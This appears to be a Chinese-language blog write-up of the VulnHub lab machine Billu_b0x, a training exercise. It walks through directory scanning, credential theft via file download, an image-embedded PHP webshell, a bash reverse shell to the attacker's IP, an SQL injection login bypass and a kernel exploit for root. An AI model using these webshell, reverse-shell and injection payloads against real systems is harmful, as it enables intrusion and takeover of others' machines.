<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"bmoos.github.io","root":"/","scheme":"Mist","version":"7.7.1","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="前言最近闲来无事，觉得自己学习理论知识太多，实验做的比较少，就在VulnHub上下载靶机来做一做，感觉VulnHub上有些靶机挺有意思的，取得root的方式也不唯一，这篇博客是VulnHub系列的第一篇writeup，之后也会把自己做的wp分享上来。">
<meta property="og:type" content="article">
<meta property="og:title" content="VulnHub靶机writeup--Billu_b0x">
<meta property="og:url" content="https://bmoos.github.io/2020/08/28/VulnHub%E9%9D%B6%E6%9C%BAwriteup-Billu-b0x/index.html">
<meta property="og:site_name" content="BMooS">
<meta property="og:description" content="前言最近闲来无事，觉得自己学习理论知识太多，实验做的比较少，就在VulnHub上下载靶机来做一做，感觉VulnHub上有些靶机挺有意思的，取得root的方式也不唯一，这篇博客是VulnHub系列的第一篇writeup，之后也会把自己做的wp分享上来。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/29/d7tGwR.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/29/d7a06U.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/29/d708mD.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/29/d70tkd.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/29/d702hn.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/29/d7BA3t.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/29/d7DVi9.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/29/d7DTY9.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/29/d7s38A.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/29/d7x8RH.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/29/dHEOiR.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/29/dHfFMQ.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/30/dbFafx.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/30/dbFong.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/30/dbkPE9.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/30/dbJK4P.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/30/dbjshD.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/30/dbj2jA.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/30/dbvAD1.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/30/dbzDA0.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/30/dqSS4f.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/30/dqCfxO.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/30/dqCTZd.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/30/dqPsl8.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/08/30/dqiGhq.png">
<meta property="article:published_time" content="2020-08-28T12:17:28.000Z">
<meta property="article:modified_time" content="2020-08-30T16:28:46.378Z">
<meta property="article:author" content="BMooS">
<meta property="article:tag" content="渗透实战">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s1.ax1x.com/2020/08/29/d7tGwR.png">

<link rel="canonical" href="https://bmoos.github.io/2020/08/28/VulnHub%E9%9D%B6%E6%9C%BAwriteup-Billu-b0x/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>VulnHub靶机writeup--Billu_b0x | BMooS</title>
  


  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?5a6862eba0dd0e57faf5fff97dbcb849";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="BMooS" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">BMooS</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://bmoos.github.io/2020/08/28/VulnHub%E9%9D%B6%E6%9C%BAwriteup-Billu-b0x/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://s2.ax1x.com/2020/01/15/lOIrB4.jpg">
      <meta itemprop="name" content="BMooS">
      <meta itemprop="description" content="BMooS的个人博客">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="BMooS">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          VulnHub靶机writeup--Billu_b0x
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-08-28 20:17:28" itemprop="dateCreated datePublished" datetime="2020-08-28T20:17:28+08:00">2020-08-28</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-08-31 00:28:46" itemprop="dateModified" datetime="2020-08-31T00:28:46+08:00">2020-08-31</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/VulnHub/" itemprop="url" rel="index">
                    <span itemprop="name">VulnHub</span>
                  </a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>2k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>2 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>最近闲来无事，觉得自己学习理论知识太多，实验做的比较少，就在VulnHub上下载靶机来做一做，感觉VulnHub上有些靶机挺有意思的，取得root的方式也不唯一，这篇博客是VulnHub系列的第一篇writeup，之后也会把自己做的wp分享上来。</p>
<a id="more"></a>

<h1 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h1><p>下载靶机Billu_b0x到本地，用VMware打开，设置网络为NAT，和kali同属于一个网段。</p>
<h2 id="进行主机扫描和端口扫描"><a href="#进行主机扫描和端口扫描" class="headerlink" title="进行主机扫描和端口扫描"></a>进行主机扫描和端口扫描</h2><p><img src="https://s1.ax1x.com/2020/08/29/d7tGwR.png" alt="d7tGwR.png"></p>
<p>发现靶机开启了http服务，用dirb进行目录扫描</p>
<p><code>dirb http://192.168.2.133 /usr/share/dirb/wordlists/big.txt</code></p>
<p>根据扫描结果可以看到网站还有phpmyadmin服务，同时扫描根目录下文件有：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;192.168.2.133&#x2F;add</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;192.168.2.133&#x2F;c</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;192.168.2.133&#x2F;head </span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;192.168.2.133&#x2F;in</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;192.168.2.133&#x2F;index</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;192.168.2.133&#x2F;panel</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;192.168.2.133&#x2F;show</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;192.168.2.133&#x2F;test</span><br></pre></td></tr></table></figure>

<h2 id="查看网站突破点"><a href="#查看网站突破点" class="headerlink" title="查看网站突破点"></a>查看网站突破点</h2><p>网站主页面：</p>
<p><img src="https://s1.ax1x.com/2020/08/29/d7a06U.png" alt="d7a06U.png"></p>
<p>主页面需要登陆，尝试爆破和万能密钥没用，看其他页面</p>
<p><img src="https://s1.ax1x.com/2020/08/29/d708mD.png" alt="d708mD.png"></p>
<p>上传文件没用，猜测是个静态页面，迷惑用的</p>
<p><img src="https://s1.ax1x.com/2020/08/29/d70tkd.png" alt="d70tkd.png"></p>
<p>phpinfo信息</p>
<p><img src="https://s1.ax1x.com/2020/08/29/d702hn.png" alt="d702hn.png"></p>
<p>这里提示file参数为空，尝试get提交无用，post提交：</p>
<p><img src="https://s1.ax1x.com/2020/08/29/d7BA3t.png" alt="d7BA3t.png"></p>
<p>通过此处将网站上的已经扫出来的文件下载，进行代码审计</p>
<p><img src="https://s1.ax1x.com/2020/08/29/d7DVi9.png" alt="d7DVi9.png"></p>
<p>在c.php文件中可以看到数据库的账号密码，通过前端phpmyadmin登陆</p>
<p><img src="https://s1.ax1x.com/2020/08/29/d7DTY9.png" alt="d7DTY9.png"></p>
<p>在数据库ica_lab下的auth表中发现网站主页登陆的用户名密码</p>
<p><img src="https://s1.ax1x.com/2020/08/29/d7s38A.png" alt="d7s38A.png"></p>
<p>这里发现可以通过phpmyadmin执行SQL语句，并且可以通过phpinfo知道网站绝对路径，想通过SQL写入webshell，但是发现权限不够</p>
<p><img src="https://s1.ax1x.com/2020/08/29/d7x8RH.png" alt="d7x8RH.png"></p>
<h2 id="上传图片马取得webshell"><a href="#上传图片马取得webshell" class="headerlink" title="上传图片马取得webshell"></a>上传图片马取得webshell</h2><p>换一种思路，通过刚才得到的用户名密码登陆网站主页：</p>
<p><img src="https://s1.ax1x.com/2020/08/29/dHEOiR.png" alt="dHEOiR.png"></p>
<p>在主页发现文件上传点，是用来上传用户图像的，之前爆目录的时候知道这里的路径为<code>网站根目录/uploaded_images/图片文件</code></p>
<p><img src="https://s1.ax1x.com/2020/08/29/dHfFMQ.png" alt="dHfFMQ.png"></p>
<p>这里可以制作一个图片马来上传：</p>
<ol>
<li><p>写好php代码</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> system($_GET[<span class="string">'cmd'</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>利用cmd来制作图片马</p>
<p> <img src="https://s1.ax1x.com/2020/08/30/dbFafx.png" alt="dbFafx.png"></p>
</li>
</ol>
<p>将图片马上传</p>
<p><img src="https://s1.ax1x.com/2020/08/30/dbFong.png" alt="dbFong.png"></p>
<p>图片马上传了，还需要文件包含漏洞得把这个图片让后端当成php来解析，之前在代码审计的时候，发现在panel.php有文件包含漏洞：</p>
<p><img src="https://s1.ax1x.com/2020/08/30/dbkPE9.png" alt="dbkPE9.png"></p>
<p>测试一下——不成功，没反应</p>
<p>猜测是因为图片太大，php代码加在图片末尾，没加载出来。</p>
<blockquote>
<p>太坑了，在网上找了好久，终于找到一个图片大小比较小的，测试成功</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2020/08/30/dbJK4P.png" alt="dbJK4P.png"></p>
<p>可以看到这里的权限是<code>www-data</code></p>
<h2 id="反弹一个低权限shell"><a href="#反弹一个低权限shell" class="headerlink" title="反弹一个低权限shell"></a>反弹一个低权限shell</h2><p>构建一个shell反弹出来：</p>
<p><code>echo &quot;bash -i &gt;&amp; /dev/tcp/192.168.2.132/4444 0&gt;&amp;1&quot; | bash</code></p>
<p>这里要进行url编码：</p>
<p><code>echo%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.2.132%2F4444%200%3E%261%22%20%7C%20bash</code></p>
<p><img src="https://s1.ax1x.com/2020/08/30/dbjshD.png" alt="dbjshD.png"></p>
<p>然后在终端中用nc监听</p>
<p><img src="https://s1.ax1x.com/2020/08/30/dbj2jA.png" alt="dbj2jA.png"></p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>拿到shell之后，要进行提权到root权限，使用<code>uname -a</code>和<code>cat /etc/issue</code>来查看系统内核版本，考虑使用本地溢出漏洞来进行提权</p>
<p><img src="https://s1.ax1x.com/2020/08/30/dbvAD1.png" alt="dbvAD1.png"></p>
<p>下载exp：<a href="https://www.exploit-db.com/exploits/37292" target="_blank" rel="noopener">https://www.exploit-db.com/exploits/37292</a></p>
<p>注意的是网站根目录没有写权限，但是在<code>/uploaded_images/</code>是一个写权限目录</p>
<p>为了上传文件方便，这里再写一个webshell用菜刀连上</p>
<p><img src="https://s1.ax1x.com/2020/08/30/dbzDA0.png" alt="dbzDA0.png"></p>
<p>直接把exp拖进去就可以了，然后编译执行，提权到root</p>
<p><img src="https://s1.ax1x.com/2020/08/30/dqSS4f.png" alt="dqSS4f.png"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这个靶机总体来说比较简单，但是渗透的时候也遇到了一些坑，增长了很多经验，值得初学者学习学习。</p>
<h2 id="番外"><a href="#番外" class="headerlink" title="番外"></a>番外</h2><p>另外两种突破点：</p>
<ol>
<li><p>在test.php文件任意下载漏洞中，可以通过phpmyadmin的配置文件获取root密码，需要猜路径，根据爆破出的目录，该配置文件所在路径为：<code>/var/www/phpmy/config.inc.php</code></p>
<p> <img src="https://s1.ax1x.com/2020/08/30/dqCfxO.png" alt="dqCfxO.png"></p>
<p> 打开文件，可以看到root的密码是<code>roottoor</code>，直接ssh连接即可</p>
<p> <img src="https://s1.ax1x.com/2020/08/30/dqCTZd.png" alt="dqCTZd.png"></p>
</li>
<li><p>根据代码审计，在对首页登陆index.php的尝试SQL注入绕过</p>
<p> <img src="https://s1.ax1x.com/2020/08/30/dqPsl8.png" alt="dqPsl8.png"></p>
<p> 则payload为<code>&#39;or 1=1 --\&#39;</code>（这里不太明白，或许就是or把pass和uname弄没了，导致where 1，最后查出数据库结果？）</p>
<p> <img src="https://s1.ax1x.com/2020/08/30/dqiGhq.png" alt="dqiGhq.png"></p>
<p> SQL注入绕过成功</p>
</li>
</ol>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%B8%97%E9%80%8F%E5%AE%9E%E6%88%98/" rel="tag"># 渗透实战</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/08/18/powershell%E5%90%8E%E6%B8%97%E9%80%8F%E9%98%B6%E6%AE%B5-%E5%B7%A5%E5%85%B7%E7%AF%87/" rel="prev" title="powershell后渗透阶段---工具篇">
      <i class="fa fa-chevron-left"></i> powershell后渗透阶段---工具篇
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/09/02/VulnHub%E9%9D%B6%E6%9C%BAwriteup-So-Simple-1/" rel="next" title="VulnHub靶机writeup--So Simple 1">
      VulnHub靶机writeup--So Simple 1 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#正文"><span class="nav-number">2.</span> <span class="nav-text">正文</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#进行主机扫描和端口扫描"><span class="nav-number">2.1.</span> <span class="nav-text">进行主机扫描和端口扫描</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#查看网站突破点"><span class="nav-number">2.2.</span> <span class="nav-text">查看网站突破点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#上传图片马取得webshell"><span class="nav-number">2.3.</span> <span class="nav-text">上传图片马取得webshell</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#反弹一个低权限shell"><span class="nav-number">2.4.</span> <span class="nav-text">反弹一个低权限shell</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#提权"><span class="nav-number">2.5.</span> <span class="nav-text">提权</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#总结"><span class="nav-number">2.6.</span> <span class="nav-text">总结</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#番外"><span class="nav-number">2.7.</span> <span class="nav-text">番外</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="BMooS"
      src="https://s2.ax1x.com/2020/01/15/lOIrB4.jpg">
  <p class="site-author-name" itemprop="name">BMooS</p>
  <div class="site-description" itemprop="description">BMooS的个人博客</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">38</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">41</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/BMooS" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;BMooS" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:slibo921@gmail.com" title="E-Mail → mailto:slibo921@gmail.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title">
      <i class="fa fa-fw fa-link"></i>
      友链
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://lyuan.co/" title="https:&#x2F;&#x2F;lyuan.co&#x2F;" rel="noopener" target="_blank">霹雳无敌我大哥</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://ftosims.github.io/" title="https:&#x2F;&#x2F;ftosims.github.io&#x2F;" rel="noopener" target="_blank">宇宙洪荒我烺神</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">BMooS</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">149k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">2:15</span>
</div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,0' opacity='0.6' zIndex='-1' count='150' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
